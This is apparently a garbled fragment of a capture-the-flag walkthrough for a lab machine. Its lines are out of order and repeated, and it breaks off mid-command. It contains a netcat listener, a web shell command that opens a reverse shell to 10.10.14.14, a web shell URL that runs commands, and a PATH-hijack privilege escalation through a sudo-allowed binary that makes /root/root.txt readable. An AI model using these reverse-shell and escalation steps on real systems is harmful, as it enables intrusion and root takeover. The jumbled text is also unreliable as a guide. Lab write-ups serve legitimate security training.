You get RCE as www-data . # On attacker machine nc -lvnp 4444 Via the web shell cmd=nc -e /bin/bash 10.10.14.14 4444
http://10.10.10.10/uploads/shell.fg?cmd=id crackerfg
echo '#!/bin/bash' > /tmp/hashgen echo 'chmod 777 /root/root.txt' >> /tmp/hashgen chmod +x /tmp/hashgen export PATH=/tmp:$PATH sudo /usr/bin/crackerfg Now /root/root.txt is readable. You get RCE as www-data
Use gobuster :
sudo -l User www-data can run /usr/bin/crackerfg as root without password. /tmp/hashgen echo 'chmod 777 /root/root.txt' >
